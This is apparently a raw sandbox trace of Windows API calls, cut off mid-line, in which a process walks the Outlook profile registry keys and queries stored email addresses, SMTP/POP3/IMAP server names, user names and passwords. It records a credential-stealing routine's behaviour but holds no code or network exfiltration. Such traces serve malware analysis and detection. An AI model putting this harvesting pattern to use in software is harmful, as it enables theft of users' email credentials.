[0590.213] lstrlenW (lpString="") returned 0 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.213] LocalFree (hMem=0x56cab0) returned 0x0 [0590.213] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.213] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000001", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.213] lstrlenW (lpString="\\") returned 1 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.213] lstrlenW (lpString="00000001") returned 8 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 89 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.213] LocalFree (hMem=0x56cab0) returned 0x0 [0590.213] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c230 | out: phkResult=0x52c230*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c218, lpData=0x0, lpcbData=0x52c22c*=0x0 | out: lpType=0x52c218*=0x0, lpData=0x0, lpcbData=0x52c22c*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c204 | out: phkResult=0x52c204*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c1ec, lpData=0x0, lpcbData=0x52c200*=0x0 | out: lpType=0x52c1ec*=0x0, lpData=0x0, lpcbData=0x52c200*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1d8 | out: phkResult=0x52c1d8*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c1c0, lpData=0x0, lpcbData=0x52c1d4*=0x0 | out: lpType=0x52c1c0*=0x0, lpData=0x0, lpcbData=0x52c1d4*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c220 | out: phkResult=0x52c220*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c208, lpData=0x0, lpcbData=0x52c21c*=0x0 | out: lpType=0x52c208*=0x0, lpData=0x0, lpcbData=0x52c21c*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1f4 | out: phkResult=0x52c1f4*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c1dc, lpData=0x0, lpcbData=0x52c1f0*=0x0 | out: lpType=0x52c1dc*=0x0, lpData=0x0, lpcbData=0x52c1f0*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1c8 | out: phkResult=0x52c1c8*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c1b0, lpData=0x0, lpcbData=0x52c1c4*=0x0 | out: lpType=0x52c1b0*=0x0, lpData=0x0, lpcbData=0x52c1c4*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x0 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.214] RegCloseKey (hKey=0x664) returned 0x0 [0590.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.214] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x0 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x0 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c200 | out: phkResult=0x52c200*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c1e8, lpData=0x0, lpcbData=0x52c1fc*=0x0 | out: lpType=0x52c1e8*=0x0, lpData=0x0, lpcbData=0x52c1fc*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1d4 | out: phkResult=0x52c1d4*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c1bc, lpData=0x0, lpcbData=0x52c1d0*=0x0 | out: lpType=0x52c1bc*=0x0, lpData=0x0, lpcbData=0x52c1d0*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1a8 | out: phkResult=0x52c1a8*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c190, lpData=0x0, lpcbData=0x52c1a4*=0x0 | out: lpType=0x52c190*=0x0, lpData=0x0, lpcbData=0x52c1a4*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c230 | out: phkResult=0x52c230*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c218, lpData=0x0, lpcbData=0x52c22c*=0x0 | out: lpType=0x52c218*=0x0, lpData=0x0, lpcbData=0x52c22c*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c204 | out: phkResult=0x52c204*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c1ec, lpData=0x0, lpcbData=0x52c200*=0x0 | out: lpType=0x52c1ec*=0x0, lpData=0x0, lpcbData=0x52c200*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1d8 | out: phkResult=0x52c1d8*=0x664) returned 0x0 [0590.215] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c1c0, lpData=0x0, lpcbData=0x52c1d4*=0x0 | out: lpType=0x52c1c0*=0x0, lpData=0x0, lpcbData=0x52c1d4*=0x0) returned 0x2 [0590.215] RegCloseKey (hKey=0x664) returned 0x0 [0590.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c220 | out: phkResult=0x52c220*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c208, lpData=0x0, lpcbData=0x52c21c*=0x0 | out: lpType=0x52c208*=0x0, lpData=0x0, lpcbData=0x52c21c*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1f4 | out: phkResult=0x52c1f4*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c1dc, lpData=0x0, lpcbData=0x52c1f0*=0x0 | out: lpType=0x52c1dc*=0x0, lpData=0x0, lpcbData=0x52c1f0*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1c8 | out: phkResult=0x52c1c8*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c1b0, lpData=0x0, lpcbData=0x52c1c4*=0x0 | out: lpType=0x52c1b0*=0x0, lpData=0x0, lpcbData=0x52c1c4*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x0 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x0 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP User", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x0 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c1e0 | out: phkResult=0x52c1e0*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c1c8, lpData=0x0, lpcbData=0x52c1dc*=0x52c200 | out: lpType=0x52c1c8*=0x0, lpData=0x0, lpcbData=0x52c1dc*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1b4 | out: phkResult=0x52c1b4*=0x664) returned 0x0 [0590.216] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c19c, lpData=0x0, lpcbData=0x52c1b0*=0x52c200 | out: lpType=0x52c19c*=0x0, lpData=0x0, lpcbData=0x52c1b0*=0x0) returned 0x2 [0590.216] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c188 | out: phkResult=0x52c188*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x52c170, lpData=0x0, lpcbData=0x52c184*=0x52c200 | out: lpType=0x52c170*=0x0, lpData=0x0, lpcbData=0x52c184*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c1d4 | out: phkResult=0x52c1d4*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c1bc, lpData=0x0, lpcbData=0x52c1d0*=0x52c1f4 | out: lpType=0x52c1bc*=0x0, lpData=0x0, lpcbData=0x52c1d0*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1a8 | out: phkResult=0x52c1a8*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c190, lpData=0x0, lpcbData=0x52c1a4*=0x52c1f4 | out: lpType=0x52c190*=0x0, lpData=0x0, lpcbData=0x52c1a4*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c17c | out: phkResult=0x52c17c*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x52c164, lpData=0x0, lpcbData=0x52c178*=0x52c1f4 | out: lpType=0x52c164*=0x0, lpData=0x0, lpcbData=0x52c178*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x52c230 | out: lpType=0x52c1f8*=0x0, lpData=0x0, lpcbData=0x52c20c*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1e4 | out: phkResult=0x52c1e4*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1cc, lpData=0x0, lpcbData=0x52c1e0*=0x52c230 | out: lpType=0x52c1cc*=0x0, lpData=0x0, lpcbData=0x52c1e0*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1b8 | out: phkResult=0x52c1b8*=0x664) returned 0x0 [0590.217] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x52c1a0, lpData=0x0, lpcbData=0x52c1b4*=0x52c230 | out: lpType=0x52c1a0*=0x0, lpData=0x0, lpcbData=0x52c1b4*=0x0) returned 0x2 [0590.217] RegCloseKey (hKey=0x664) returned 0x0 [0590.217] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.217] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000002", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.218] lstrlenW (lpString="\\") returned 1 [0590.218] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0590.218] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.218] lstrlenW (lpString="00000002") returned 8 [0590.218] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 89 [0590.218] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.218] LocalFree (hMem=0x56cab0) returned 0x0 [0590.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c230 | out: phkResult=0x52c230*=0x664) returned 0x0 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x52c218, lpData=0x0, lpcbData=0x52c22c*=0x0 | out: lpType=0x52c218*=0x1, lpData=0x0, lpcbData=0x52c22c*=0x1e) returned 0x0 [0590.218] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0x5d1978 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x5d1978, lpcbData=0x52c22c*=0x1e | out: lpType=0x0, lpData=0x5d1978*=0x73, lpcbData=0x52c22c*=0x1e) returned 0x0 [0590.218] RegCloseKey (hKey=0x664) returned 0x0 [0590.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c220 | out: phkResult=0x52c220*=0x664) returned 0x0 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x52c208, lpData=0x0, lpcbData=0x52c21c*=0x0 | out: lpType=0x52c208*=0x1, lpData=0x0, lpcbData=0x52c21c*=0xa) returned 0x0 [0590.218] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x58d548, lpcbData=0x52c21c*=0xa | out: lpType=0x0, lpData=0x58d548*=0x68, lpcbData=0x52c21c*=0xa) returned 0x0 [0590.218] RegCloseKey (hKey=0x664) returned 0x0 [0590.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c210 | out: phkResult=0x52c210*=0x664) returned 0x0 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x52c1f8, lpData=0x0, lpcbData=0x52c20c*=0x0 | out: lpType=0x52c1f8*=0x1, lpData=0x0, lpcbData=0x52c20c*=0xc) returned 0x0 [0590.218] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x58d840 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x58d840, lpcbData=0x52c20c*=0xc | out: lpType=0x0, lpData=0x58d840*=0x66, lpcbData=0x52c20c*=0xc) returned 0x0 [0590.218] RegCloseKey (hKey=0x664) returned 0x0 [0590.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c200 | out: phkResult=0x52c200*=0x664) returned 0x0 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c1e8, lpData=0x0, lpcbData=0x52c1fc*=0x0 | out: lpType=0x52c1e8*=0x0, lpData=0x0, lpcbData=0x52c1fc*=0x0) returned 0x2 [0590.218] RegCloseKey (hKey=0x664) returned 0x0 [0590.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c1d4 | out: phkResult=0x52c1d4*=0x664) returned 0x0 [0590.218] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c1bc, lpData=0x0, lpcbData=0x52c1d0*=0x0 | out: lpType=0x52c1bc*=0x0, lpData=0x0, lpcbData=0x52c1d0*=0x0) returned 0x2 [0590.218] RegCloseKey (hKey=0x664) returned 0x0 [0590.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1a8 | out: phkResult=0x52c1a8*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x52c190, lpData=0x0, lpcbData=0x52c1a4*=0x0 | out: lpType=0x52c190*=0x0, lpData=0x0, lpcbData=0x52c1a4*=0x0) returned 0x2 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c230 | out: phkResult=0x52c230*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c218, lpData=0x0, lpcbData=0x52c22c*=0x0 | out: lpType=0x52c218*=0x0, lpData=0x0, lpcbData=0x52c22c*=0x0) returned 0x2 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x52c204 | out: phkResult=0x52c204*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c1ec, lpData=0x0, lpcbData=0x52c200*=0x0 | out: lpType=0x52c1ec*=0x0, lpData=0x0, lpcbData=0x52c200*=0x0) returned 0x2 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x52c1d8 | out: phkResult=0x52c1d8*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="SMTP User", lpReserved=0x0, lpType=0x52c1c0, lpData=0x0, lpcbData=0x52c1d4*=0x0 | out: lpType=0x52c1c0*=0x0, lpData=0x0, lpcbData=0x52c1d4*=0x0) returned 0x2 [0590.219] RegCloseKey (hKey=0x664) returned 0x0 [0590.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x52c220 | out: phkResult=0x52c220*=0x664) returned 0x0 [0590.219] RegQueryValueExW (in: hKey=0x664, lpValueName="POP3 User", lpReserved=0x0, lpType=0x52c208, lpData=0x0, lpcbData=0x52c21c*=0x0 | out: lpType=0x52c208*=0x1, lpData=0x0, lpcbData=0x52c21c*=0x1e) returned 0x0 [0590.219] LocalAlloc (uFlags=0x40, uBytes=0xa0) 